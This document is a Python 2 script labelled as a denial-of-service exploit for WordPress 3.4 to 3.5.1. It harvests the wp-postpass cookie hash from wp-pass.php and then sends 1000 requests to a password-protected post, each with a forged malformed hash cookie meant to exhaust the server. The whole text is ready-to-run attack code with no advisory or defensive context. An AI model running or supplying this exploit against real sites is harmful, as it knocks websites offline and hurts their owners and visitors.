wordpress-dos.py # WordPress Denial of Service exploit # WordPress 3.4 - 3.5.1 # Author: vnd at vndh.net # Version by MustLive (http://websecurity.com.ua) import httplib import re def get_cookie_hash(hostname, url): headers = {'Content-type': 'application/x-www-form-urlencoded'} handler = httplib.HTTPConnection(hostname) handler.request('POST', url, 'post_password=', headers=headers) response = handler.getresponse() set_cookie = response.getheader('set-cookie') if set_cookie is None: raise RuntimeError('cannot fetch set-cookie header') pattern = re.compile('wp-postpass_([0-9a-f]{32})') result = pattern.search(set_cookie) if result is None: raise RuntimeError('cannot fetch cookie hash') return result.groups()[0] def send_request(hostname, post, cookie_name): headers = {'Cookie': 'wp-postpass_%s=%%24P%%24Spaddding' % cookie_name} handler = httplib.HTTPConnection(hostname) handler.request('GET', post, 'action=postpass&post_password=a', headers=headers) if __name__ == '__main__': hostname = 'site' posturl = '/?p=4' # link to password protected post or page requests = 1000 pattern = re.compile('(.+/)') url = pattern.search(posturl).groups()[0] + 'wp-pass.php' cookie_hash = get_cookie_hash(hostname, url) print '[+] received cookie hash: %s' % cookie_hash for i in xrange(requests): print '[+] sending request %d...' % (i + 1) send_request(hostname, posturl, cookie_hash)